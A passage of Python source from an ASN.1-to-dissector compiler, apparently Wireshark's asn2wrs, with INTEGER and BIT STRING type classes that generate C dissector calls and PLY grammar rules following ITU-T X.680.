elif self.constr.type == 'SingleValue' or self.constr.type == 'ValueRange':
return 'INTEGER' + '_' + self.constr.eth_constrname()
else:
return 'INTEGER' + '_' + self.constr.eth_tname()
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_INTEGER')
def eth_ftype(self, ectx):
if self.HasConstraint():
if not self.constr.IsNegativ():
if self.constr.Needs64b(ectx):
return ('FT_UINT64', 'BASE_DEC')
else:
return ('FT_UINT32', 'BASE_DEC')
if self.constr.Needs64b(ectx):
return ('FT_INT64', 'BASE_DEC')
return ('FT_INT32', 'BASE_DEC')
def eth_strings(self):
if (self.named_list):
return '$$'
else:
return 'NULL'
def eth_has_vals(self):
if (self.named_list):
return True
else:
return False
def get_vals(self, ectx):
vals = []
for e in (self.named_list):
vals.append((int(e.val), e.ident))
return vals
def eth_type_vals(self, tname, ectx):
if not self.eth_has_vals(): return ''
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals(ectx)
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
if not self.eth_has_enum(tname, ectx): return ''
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if self.HasValueConstraint():
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_value_constr(ectx)
if (pars['FN_VARIANT'] == '') and self.constr.Needs64b(ectx):
if ectx.Ber(): pars['FN_VARIANT'] = '64'
else: pars['FN_VARIANT'] = '_64b'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_integer%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per() and not self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_integer%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s'),))
elif (ectx.Per() and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(VAL_PTR)s', '%(EXT)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BitStringType ------------------------------------------------------------
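# BIT STRING: optional named bits become a bit table for BER; CONTAINING
# contents constraints are handled like those of OCTET STRING above.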
class BitStringType (Type):
def to_python (self, ctx):
return "asn1.BITSTRING_class ([%s])" % (",".join (
[x.to_python (ctx) for x in self.named_list]))
def eth_tname(self):
if self.named_list:
return Type.eth_tname(self)
elif not self.HasConstraint():
return 'BIT_STRING'
elif self.constr.IsSize():
return 'BIT_STRING' + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_BITSTRING')
def eth_ftype(self, ectx):
return ('FT_BYTES', 'BASE_NONE')
def eth_need_tree(self):
return self.named_list
def eth_need_pdu(self, ectx):
pdu = None
if self.HasContentsConstraint():
t = self.constr.GetContents(ectx)
if t and (ectx.default_containing_variant in ('_pdu', '_pdu_new')):
pdu = { 'type' : t,
'new' : ectx.default_containing_variant == '_pdu_new' }
return pdu
def eth_named_bits(self):
bits = []
if (self.named_list):
for e in (self.named_list):
bits.append((int(e.val), e.ident))
return bits
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['LEN_PTR'] = 'NULL'
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
if 'ETT_INDEX' not in pars:
pars['ETT_INDEX'] = '-1'
pars['TABLE'] = 'NULL'
if self.eth_named_bits():
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_bits'
if self.HasContentsConstraint():
pars['FN_VARIANT'] = ectx.default_containing_variant
t = self.constr.GetContents(ectx)
if t:
if pars['FN_VARIANT'] in ('_pdu', '_pdu_new'):
t = ectx.field[t]['ethname']
pars['TYPE_REF_PROTO'] = ''
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_TNAME)s'
else:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
table = ''
bits = self.eth_named_bits()
if (bits and ectx.Ber()):
table = ectx.eth_bits(tname, bits)
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_bitstring', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),
('%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_bitstring', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if self.HasContentsConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_bit_string_containing%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(TYPE_REF_FN)s'),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_bit_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(VAL_PTR)s', '%(LEN_PTR)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BStringValue ------------------------------------------------------------
bstring_tab = {
'0000' : '0',
'0001' : '1',
'0010' : '2',
'0011' : '3',
'0100' : '4',
'0101' : '5',
'0110' : '6',
'0111' : '7',
'1000' : '8',
'1001' : '9',
'1010' : 'A',
'1011' : 'B',
'1100' : 'C',
'1101' : 'D',
'1110' : 'E',
'1111' : 'F',
}
class BStringValue (Value):
def to_str(self, ectx):
v = self.val[1:-2]
if len(v) % 8:
v += '0' * (8 - len(v) % 8)
vv = '0x'
for i in (list(range(0, len(v), 4))):
vv += bstring_tab[v[i:i+4]]
return vv
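# Illustrative example: to_str() pads the bit string to a whole number of
# octets and emits a C hex literal, e.g.
#   BStringValue(val = "'0101'B").to_str(ectx)
#   -> '0101' padded to '01010000' -> nibbles 0101/0000 -> '0x50'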
#--- HStringValue ------------------------------------------------------------
class HStringValue (Value):
def to_str(self, ectx):
vv = '0x'
vv += self.val[1:-2]
return vv
def __int__(self):
return int(self.val[1:-2], 16)
#--- FieldSpec ----------------------------------------------------------------
class FieldSpec (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name):
self.name = name
def get_repr(self):
return ['#UNSUPPORTED_' + self.type]
def fld_repr(self):
repr = [self.name]
repr.extend(self.get_repr())
return repr
class TypeFieldSpec (FieldSpec):
def get_repr(self):
return []
class FixedTypeValueFieldSpec (FieldSpec):
def get_repr(self):
if isinstance(self.typ, Type_Ref):
repr = ['TypeReference', self.typ.val]
else:
repr = [self.typ.type]
return repr
class VariableTypeValueFieldSpec (FieldSpec):
def get_repr(self):
return ['_' + self.type]
class FixedTypeValueSetFieldSpec (FieldSpec):
def get_repr(self):
return ['_' + self.type]
class ObjectFieldSpec (FieldSpec):
def get_repr(self):
return ['ClassReference', self.cls.val]
class ObjectSetFieldSpec (FieldSpec):
def get_repr(self):
return ['ClassReference', self.cls.val]
#==============================================================================
def p_module_list_1 (t):
'module_list : module_list ModuleDefinition'
t[0] = t[1] + [t[2]]
def p_module_list_2 (t):
'module_list : ModuleDefinition'
t[0] = [t[1]]
#--- ITU-T Recommendation X.680 -----------------------------------------------
# 11 ASN.1 lexical items --------------------------------------------------------
# 11.2 Type references
def p_type_ref (t):
'type_ref : UCASE_IDENT'
t[0] = Type_Ref(val=t[1])
# 11.3 Identifiers
def p_identifier (t):
'identifier : LCASE_IDENT'
t[0] = t[1]
# 11.4 Value references
# cause reduce/reduce conflict
#def p_valuereference (t):
# 'valuereference : LCASE_IDENT'
# t[0] = Value_Ref(val=t[1])
# 11.5 Module references
def p_modulereference (t):
'modulereference : UCASE_IDENT'
t[0] = t[1]
# 12 Module definition --------------------------------------------------------
# 12.1
def p_ModuleDefinition (t):
'ModuleDefinition : ModuleIdentifier DEFINITIONS TagDefault ASSIGNMENT ModuleBegin BEGIN ModuleBody END'
t[0] = Module (ident = t[1], tag_def = t[3], body = t[7])
def p_ModuleBegin (t):
'ModuleBegin : '
if t[-4].val == 'Remote-Operations-Information-Objects':
x880_module_begin()
def p_TagDefault_1 (t):
'''TagDefault : EXPLICIT TAGS
| IMPLICIT TAGS
| AUTOMATIC TAGS '''
t[0] = Default_Tags (dfl_tag = t[1])
def p_TagDefault_2 (t):
'TagDefault : '
# 12.2 The "TagDefault" is taken as EXPLICIT TAGS if it is "empty".
t[0] = Default_Tags (dfl_tag = 'EXPLICIT')
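# Illustrative example: the header "MyModule DEFINITIONS AUTOMATIC TAGS ::= BEGIN"
# yields Default_Tags(dfl_tag = 'AUTOMATIC'); a header with no TagDefault at all
# matches the empty production above and the module defaults to EXPLICIT tagging.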
def p_ModuleIdentifier_1 (t):
'ModuleIdentifier : modulereference DefinitiveIdentifier' # name, oid
t [0] = Node('module_ident', val = t[1], ident = t[2])
def p_ModuleIdentifier_2 (t):
'ModuleIdentifier : modulereference' # name, oid
t [0] = Node('module_ident', val = t[1], ident = None)
def p_DefinitiveIdentifier (t):
'DefinitiveIdentifier : ObjectIdentifierValue'
t[0] = t[1]
#def p_module_ref (t):
# 'module_ref : UCASE_IDENT'
# t[0] = t[1]
def p_ModuleBody_1 (t):
'ModuleBody : Exports Imports AssignmentList'
t[0] = Module_Body (exports = t[1], imports = t[2], assign_list = t[3])
def p_ModuleBody_2 (t):
'ModuleBody : '
t[0] = Node ('module_body', exports = [], imports = [], assign_list = [])
def p_Exports_1 (t):
'Exports : EXPORTS syms_exported SEMICOLON'
t[0] = t[2]
def p_Exports_2 (t):
'Exports : EXPORTS ALL SEMICOLON'
t[0] = [ 'ALL' ]
def p_Exports_3 (t):
'Exports : '
t[0] = [ 'ALL' ]
def p_syms_exported_1 (t):
'syms_exported : exp_sym_list'
t[0] = t[1]
def p_syms_exported_2 (t):
'syms_exported : '
t[0] = []
def p_exp_sym_list_1 (t):
'exp_sym_list : Symbol'
t[0] = [t[1]]
def p_exp_sym_list_2 (t):
'exp_sym_list : exp_sym_list COMMA Symbol'
t[0] = t[1] + [t[3]]
def p_Imports_1 (t):
'Imports : importsbegin IMPORTS SymbolsImported SEMICOLON'
t[0] = t[3]
global lcase_ident_assigned
lcase_ident_assigned = {}
def p_importsbegin (t):
'importsbegin : '
global lcase_ident_assigned
global g_conform
lcase_ident_assigned = {}
lcase_ident_assigned.update(g_conform.use_item('ASSIGNED_ID', 'OBJECT_IDENTIFIER'))
def p_Imports_2 (t):
'Imports : '
t[0] = []
def p_SymbolsImported_1(t):
'SymbolsImported : '
t[0] = []
def p_SymbolsImported_2 (t):
'SymbolsImported : SymbolsFromModuleList'
t[0] = t[1]
def p_SymbolsFromModuleList_1 (t):
'SymbolsFromModuleList : SymbolsFromModuleList SymbolsFromModule'
t[0] = t[1] + [t[2]]
def p_SymbolsFromModuleList_2 (t):
'SymbolsFromModuleList : SymbolsFromModule'
t[0] = [t[1]]
def p_SymbolsFromModule (t):
'SymbolsFromModule : SymbolList FROM GlobalModuleReference'
t[0] = Node ('SymbolList', symbol_list = t[1], module = t[3])
for s in (t[0].symbol_list):
if (isinstance(s, Value_Ref)): lcase_ident_assigned[s.val] = t[3]
import_symbols_from_module(t[0].module, t[0].symbol_list)
def import_symbols_from_module(module, symbol_list):
if module.val == 'Remote-Operations-Information-Objects':
for i in range(len(symbol_list)):
s = symbol_list[i]
if isinstance(s, Type_Ref) or isinstance(s, Class_Ref):
x880_import(s.val)
if isinstance(s, Type_Ref) and is_class_ident(s.val):
symbol_list[i] = Class_Ref (val = s.val)
return
for i in range(len(symbol_list)):
s = symbol_list[i]
if isinstance(s, Type_Ref) and is_class_ident("$%s$%s" % (module.val, s.val)):
import_class_from_module(module.val, s.val)
if isinstance(s, Type_Ref) and is_class_ident(s.val):
symbol_list[i] = Class_Ref (val = s.val)
def p_GlobalModuleReference (t):
'GlobalModuleReference : modulereference AssignedIdentifier'
t [0] = Node('module_ident', val = t[1], ident = t[2])
def p_AssignedIdentifier_1 (t):
'AssignedIdentifier : ObjectIdentifierValue'
t[0] = t[1]
def p_AssignedIdentifier_2 (t):
'AssignedIdentifier : LCASE_IDENT_ASSIGNED'
t[0] = t[1]
def p_AssignedIdentifier_3 (t):
'AssignedIdentifier : '
pass
def p_SymbolList_1 (t):
'SymbolList : Symbol'
t[0] = [t[1]]
def p_SymbolList_2 (t):
'SymbolList : SymbolList COMMA Symbol'
t[0] = t[1] + [t[3]]
def p_Symbol (t):
'''Symbol : Reference
| ParameterizedReference'''
t[0] = t[1]
def p_Reference_1 (t):
'''Reference : type_ref
| objectclassreference '''
t[0] = t[1]
def p_Reference_2 (t):
'''Reference : LCASE_IDENT_ASSIGNED
                 | identifier ''' # instead of valuereference which causes reduce/reduce conflict
t[0] = Value_Ref(val=t[1])
def p_AssignmentList_1 (t):
'AssignmentList : AssignmentList Assignment'
t[0] = t[1] + [t[2]]
def p_AssignmentList_2 (t):
'AssignmentList : Assignment SEMICOLON'
t[0] = [t[1]]
def p_AssignmentList_3 (t):
'AssignmentList : Assignment'
t[0] = [t[1]]
def p_Assignment (t):
'''Assignment : TypeAssignment
| ValueAssignment
| ValueSetTypeAssignment
| ObjectClassAssignment
| ObjectAssignment
| ObjectSetAssignment
| ParameterizedAssignment
| pyquote '''
t[0] = t[1]
# 13 Referencing type and value definitions -----------------------------------
# 13.1
def p_DefinedType (t):
'''DefinedType : ExternalTypeReference
| type_ref
| ParameterizedType'''
t[0] = t[1]
def p_DefinedValue_1(t):
'''DefinedValue : ExternalValueReference'''
t[0] = t[1]
def p_DefinedValue_2(t):
    '''DefinedValue : identifier ''' # instead of valuereference which causes reduce/reduce conflict
t[0] = Value_Ref(val=t[1])
# 13.6
def p_ExternalTypeReference (t):
'ExternalTypeReference : modulereference DOT type_ref'
t[0] = Node ('ExternalTypeReference', module = t[1], typ = t[3])
def p_ExternalValueReference (t):
'ExternalValueReference : modulereference DOT identifier'
t[0] = Node ('ExternalValueReference', module = t[1], ident = t[3])
# 15 Assigning types and values -----------------------------------------------
# 15.1
def p_TypeAssignment (t):
'TypeAssignment : UCASE_IDENT ASSIGNMENT Type'
t[0] = t[3]
t[0].SetName(t[1])
# 15.2
def p_ValueAssignment (t):
'ValueAssignment : LCASE_IDENT ValueType ASSIGNMENT Value'
t[0] = ValueAssignment(ident = t[1], typ = t[2], val = t[4])
# only "simple" types are supported to simplify grammer
def p_ValueType (t):
'''ValueType : type_ref
| BooleanType
| IntegerType
| ObjectIdentifierType
| OctetStringType
| RealType '''
t[0] = t[1]
# 15.6
def p_ValueSetTypeAssignment (t):
'ValueSetTypeAssignment : UCASE_IDENT ValueType ASSIGNMENT ValueSet'
t[0] = Node('ValueSetTypeAssignment', name=t[1], typ=t[2], val=t[4])
# 15.7
def p_ValueSet (t):
'ValueSet : lbraceignore rbraceignore'
t[0] = None
# 16 Definition of types and values -------------------------------------------
# 16.1
def p_Type (t):
'''Type : BuiltinType
| ReferencedType
| ConstrainedType'''
t[0] = t[1]
# 16.2
def p_BuiltinType (t):
'''BuiltinType : AnyType
| BitStringType
| BooleanType
| CharacterStringType
| ChoiceType
| EmbeddedPDVType
| EnumeratedType
| ExternalType
| InstanceOfType
| IntegerType
| NullType
| ObjectClassFieldType
| ObjectIdentifierType
| OctetStringType
| RealType
| RelativeOIDType
| SequenceType
| SequenceOfType
| SetType
| SetOfType
| TaggedType'''
t[0] = t[1]
# 16.3
def p_ReferencedType (t):
'''ReferencedType : DefinedType
| UsefulType
| SelectionType'''
t[0] = t[1]
# 16.5
def p_NamedType (t):
'NamedType : identifier Type'
t[0] = t[2]
t[0].SetName (t[1])
# 16.7
def p_Value (t):
'''Value : BuiltinValue
| ReferencedValue
| ObjectClassFieldValue'''
t[0] = t[1]
# 16.9
def p_BuiltinValue (t):
'''BuiltinValue : BooleanValue
| ChoiceValue
| IntegerValue
| ObjectIdentifierValue
| RealValue
| SequenceValue
| hex_string
| binary_string
| char_string''' # XXX we don't support {data} here
t[0] = t[1]
# 16.11
def p_ReferencedValue (t):
'''ReferencedValue : DefinedValue
| ValueFromObject'''
t[0] = t[1]
# 16.13
#def p_NamedValue (t):
# 'NamedValue : identifier Value'
# t[0] = Node ('NamedValue', ident = t[1], value = t[2])
# 17 Notation for the boolean type --------------------------------------------
# 17.1
def p_BooleanType (t):
'BooleanType : BOOLEAN'
t[0] = BooleanType ()
# 17.2
def p_BooleanValue (t):
'''BooleanValue : TRUE
| FALSE'''
t[0] = t[1]
# 18 Notation for the integer type --------------------------------------------
# 18.1
def p_IntegerType_1 (t):
'IntegerType : INTEGER'
t[0] = IntegerType (named_list = None)
def p_IntegerType_2 (t):
'IntegerType : INTEGER LBRACE NamedNumberList RBRACE'
t[0] = IntegerType(named_list = t[3])
def p_NamedNumberList_1 (t):
'NamedNumberList : NamedNumber'
t[0] = [t[1]]
def p_NamedNumberList_2 (t):
'NamedNumberList : NamedNumberList COMMA NamedNumber'
t[0] = t[1] + [t[3]]
def p_NamedNumber (t):
'''NamedNumber : identifier LPAREN SignedNumber RPAREN
| identifier LPAREN DefinedValue RPAREN'''
t[0] = NamedNumber(ident = t[1], val = t[3])
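# Illustrative example: "INTEGER { disabled(0), enabled(1) }" parses into
#   IntegerType(named_list = [NamedNumber(ident = 'disabled', val = '0'),
#                             NamedNumber(ident = 'enabled', val = '1')])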
def p_SignedNumber_1 (t):
'SignedNumber : NUMBER'
t[0] = t [1]
def p_SignedNumber_2 (t):
'SignedNumber : MINUS NUMBER'
t[0] = '-' + t[2]
# 18.9
def p_IntegerValue (t):
'IntegerValue : SignedNumber'
t[0] = t [1]
# 19 Notation for the enumerated type -----------------------------------------
# 19.1
def p_EnumeratedType (t):
'EnumeratedType : ENUMERATED LBRACE Enumerations RBRACE'
t[0] = EnumeratedType (val = t[3]['val'], ext = t[3]['ext'])
def p_Enumerations_1 (t):
'Enumerations : Enumeration'
t[0] = { 'val' : t[1], 'ext' : None }
def p_Enumerations_2 (t):
'Enumerations : Enumeration COMMA ELLIPSIS ExceptionSpec'
t[0] = { 'val' : t[1], 'ext' : [] }
def p_Enumerations_3 (t):
'Enumerations : Enumeration COMMA ELLIPSIS ExceptionSpec COMMA Enumeration'
t[0] = { 'val' : t[1], 'ext' : t[6] }
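# Illustrative example: "ENUMERATED { red(0), green(1), ..., blue(2) }"
# matches the third production above and yields
#   { 'val' : [red(0), green(1)], 'ext' : [blue(2)] }
# i.e. root enumerators before the ellipsis, extension additions after it.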
def p_Enumeration_1 (t):
'Enumeration : EnumerationItem'
t[0] = [t[1]]
def p_Enumeration_2 (t):
'Enumeration : Enumeration COMMA EnumerationItem'
t[0] = t[1] + [t[3]]
def p_EnumerationItem (t):
'''EnumerationItem : Identifier
| NamedNumber'''
t[0] = t[1]
def p_Identifier (t):
'Identifier : identifier'
t[0] = Node ('Identifier', ident = t[1])
# 20 Notation for the real type -----------------------------------------------
# 20.1
def p_RealType (t):
'RealType : REAL'
t[0] = RealType ()
# 20.6
def p_RealValue (t):
'''RealValue : REAL_NUMBER
| SpecialRealValue'''
t[0] = t [1]
def p_SpecialRealValue (t):
'''SpecialRealValue : PLUS_INFINITY
| MINUS_INFINITY'''
t[0] = t[1]
# 21 Notation for the bitstring type ------------------------------------------
# 21.1
def p_BitStringType_1 (t):
'BitStringType : BIT STRING'
t[0] = BitStringType (named_list = None)
def p_BitStringType_2 (t):
'BitStringType : BIT STRING LBRACE NamedBitList RBRACE'
t[0] = BitStringType (named_list = t[4])
def p_NamedBitList_1 (t):
'NamedBitList : NamedBit'
t[0] = [t[1]]
def p_NamedBitList_2 (t):
'NamedBitList : NamedBitList COMMA NamedBit'
t[0] = t[1] + [t[3]]
def p_NamedBit (t):
'''NamedBit : identifier LPAREN NUMBER RPAREN
| identifier LPAREN DefinedValue RPAREN'''
t[0] = NamedNumber (ident = t[1], val = t[3])
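# Illustrative example: "BIT STRING { ack(0), urgent(1) }" produces
# BitStringType(named_list = [NamedNumber(ident = 'ack', val = '0'),
#                             NamedNumber(ident = 'urgent', val = '1')]),
# which BitStringType.eth_named_bits() later flattens to [(0, 'ack'), (1, 'urgent')].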
# 22 Notation for the octetstring type ----------------------------------------
# 22.1
def p_OctetStringType (t):
'OctetStringType : OCTET STRING'
t[0] = OctetStringType ()
# 23 Notation for the null type -----------------------------------------------
# 23.1
def p_NullType (t):
'NullType : NULL'
t[0] = NullType ()
# 23.3
def p_NullValue (t):
'NullValue : NULL'
t[0] = NullValue ()
# 24 Notation for sequence types ----------------------------------------------
# 24.1
def p_SequenceType_1 (t):
'SequenceType : SEQUENCE LBRACE RBRACE'
t[0] = SequenceType (elt_list = [])
def p_SequenceType_2 (t):
'SequenceType : SEQUENCE LBRACE ComponentTypeLists RBRACE'
t[0] = SequenceType (elt_list = t[3]['elt_list'])
if 'ext_list' in t[3]:
t[0].ext_list = t[3]['ext_list']
if 'elt_list2' in t[3]:
t[0].elt_list2 = t[3]['elt_list2']
def p_ExtensionAndException_1 (t):
'ExtensionAndException : ELLIPSIS'
t[0] = []
def p_OptionalExtensionMarker_1 (t):
'OptionalExtensionMarker : COMMA ELLIPSIS'
t[0] = True
def p_OptionalExtensionMarker_2 (t):
'OptionalExtensionMarker : '
t[0] = False
def p_ComponentTypeLists_1 (t):
'ComponentTypeLists : ComponentTypeList'
t[0] = {'elt_list' : t[1]}
def p_ComponentTypeLists_2 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : []}
def p_ComponentTypeLists_3 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionAdditionList OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_ComponentTypeLists_4 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionEndMarker COMMA ComponentTypeList'
t[0] = {'elt_list' : t[1], 'ext_list' : [], 'elt_list2' : t[6]}
def p_ComponentTypeLists_5 (t):
'ComponentTypeLists : ComponentTypeList COMMA ExtensionAndException ExtensionAdditionList ExtensionEndMarker COMMA ComponentTypeList'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4], 'elt_list2' : t[7]}
def p_ComponentTypeLists_6 (t):
'ComponentTypeLists : ExtensionAndException OptionalExtensionMarker'
t[0] = {'elt_list' : [], 'ext_list' : []}
def p_ComponentTypeLists_7 (t):
'ComponentTypeLists : ExtensionAndException ExtensionAdditionList OptionalExtensionMarker'
t[0] = {'elt_list' : [], 'ext_list' : t[2]}
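# Illustrative example: "SEQUENCE { a INTEGER, ..., b BOOLEAN, ..., c REAL }"
# matches ComponentTypeLists_5 above and is split into
#   elt_list  = [a]   (root components before the first ellipsis)
#   ext_list  = [b]   (extension additions between the ellipses)
#   elt_list2 = [c]   (root components after the second ellipsis)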
def p_ExtensionEndMarker (t):
'ExtensionEndMarker : COMMA ELLIPSIS'
pass
def p_ExtensionAdditionList_1 (t):
'ExtensionAdditionList : COMMA ExtensionAddition'
t[0] = [t[2]]
def p_ExtensionAdditionList_2 (t):
'ExtensionAdditionList : ExtensionAdditionList COMMA ExtensionAddition'
t[0] = t[1] + [t[3]]
def p_ExtensionAddition_1 (t):
'ExtensionAddition : ExtensionAdditionGroup'
t[0] = Node ('elt_type', val = t[1], optional = 0)
def p_ExtensionAddition_2 (t):
'ExtensionAddition : ComponentType'
t[0] = t[1]
def p_ExtensionAdditionGroup (t):
'ExtensionAdditionGroup : LVERBRACK VersionNumber ComponentTypeList RVERBRACK'
t[0] = ExtensionAdditionGroup (ver = t[2], elt_list = t[3])
def p_VersionNumber_1 (t):
'VersionNumber : '
def p_VersionNumber_2 (t):
'VersionNumber : NUMBER COLON'
t[0] = t[1]
def p_ComponentTypeList_1 (t):
'ComponentTypeList : ComponentType'
t[0] = [t[1]]
def p_ComponentTypeList_2 (t):
'ComponentTypeList : ComponentTypeList COMMA ComponentType'
t[0] = t[1] + [t[3]]
def p_ComponentType_1 (t):
'ComponentType : NamedType'
t[0] = Node ('elt_type', val = t[1], optional = 0)
def p_ComponentType_2 (t):
'ComponentType : NamedType OPTIONAL'
t[0] = Node ('elt_type', val = t[1], optional = 1)
def p_ComponentType_3 (t):
'ComponentType : NamedType DEFAULT DefaultValue'
t[0] = Node ('elt_type', val = t[1], optional = 1, default = t[3])
def p_ComponentType_4 (t):
'ComponentType : COMPONENTS OF Type'
t[0] = Node ('components_of', typ = t[3])
def p_DefaultValue_1 (t):
'''DefaultValue : ReferencedValue
| BooleanValue
| ChoiceValue
| IntegerValue
| RealValue
| hex_string
| binary_string
| char_string
| ObjectClassFieldValue'''
t[0] = t[1]
def p_DefaultValue_2 (t):
'DefaultValue : lbraceignore rbraceignore'
t[0] = ''
# 24.17
def p_SequenceValue_1 (t):
'SequenceValue : LBRACE RBRACE'
t[0] = []
#def p_SequenceValue_2 (t):
# 'SequenceValue : LBRACE ComponentValueList RBRACE'
# t[0] = t[2]
#def p_ComponentValueList_1 (t):
# 'ComponentValueList : NamedValue'
# t[0] = [t[1]]
#def p_ComponentValueList_2 (t):
# 'ComponentValueList : ComponentValueList COMMA NamedValue'
# t[0] = t[1] + [t[3]]
# 25 Notation for sequence-of types -------------------------------------------
# 25.1
def p_SequenceOfType (t):
'''SequenceOfType : SEQUENCE OF Type
| SEQUENCE OF NamedType'''
t[0] = SequenceOfType (val = t[3], size_constr = None)
# 26 Notation for set types ---------------------------------------------------
# 26.1
def p_SetType_1 (t):
'SetType : SET LBRACE RBRACE'
t[0] = SetType (elt_list = [])
def p_SetType_2 (t):
'SetType : SET LBRACE ComponentTypeLists RBRACE'
t[0] = SetType (elt_list = t[3]['elt_list'])
if 'ext_list' in t[3]:
t[0].ext_list = t[3]['ext_list']
if 'elt_list2' in t[3]:
t[0].elt_list2 = t[3]['elt_list2']
# 27 Notation for set-of types ------------------------------------------------
# 27.1
def p_SetOfType (t):
'''SetOfType : SET OF Type
| SET OF NamedType'''
t[0] = SetOfType (val = t[3])
# 28 Notation for choice types ------------------------------------------------
# 28.1
def p_ChoiceType (t):
'ChoiceType : CHOICE LBRACE AlternativeTypeLists RBRACE'
if 'ext_list' in t[3]:
t[0] = ChoiceType (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = ChoiceType (elt_list = t[3]['elt_list'])
def p_AlternativeTypeLists_1 (t):
'AlternativeTypeLists : AlternativeTypeList'
t[0] = {'elt_list' : t[1]}
def p_AlternativeTypeLists_2 (t):
'AlternativeTypeLists : AlternativeTypeList COMMA ExtensionAndException ExtensionAdditionAlternatives OptionalExtensionMarker'
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_ExtensionAdditionAlternatives_1 (t):
'ExtensionAdditionAlternatives : ExtensionAdditionAlternativesList'
t[0] = t[1]
def p_ExtensionAdditionAlternatives_2 (t):
'ExtensionAdditionAlternatives : '
t[0] = []
def p_ExtensionAdditionAlternativesList_1 (t):
'ExtensionAdditionAlternativesList : COMMA ExtensionAdditionAlternative'
t[0] = t[2]
def p_ExtensionAdditionAlternativesList_2 (t):
'ExtensionAdditionAlternativesList : ExtensionAdditionAlternativesList COMMA ExtensionAdditionAlternative'
t[0] = t[1] + t[3]
def p_ExtensionAdditionAlternative_1 (t):
'ExtensionAdditionAlternative : NamedType'
t[0] = [t[1]]
def p_ExtensionAdditionAlternative_2 (t):
'ExtensionAdditionAlternative : ExtensionAdditionAlternativesGroup'
t[0] = t[1]
def p_ExtensionAdditionAlternativesGroup (t):
'ExtensionAdditionAlternativesGroup : LVERBRACK VersionNumber AlternativeTypeList RVERBRACK'
t[0] = t[3]
def p_AlternativeTypeList_1 (t):
'AlternativeTypeList : NamedType'
t[0] = [t[1]]
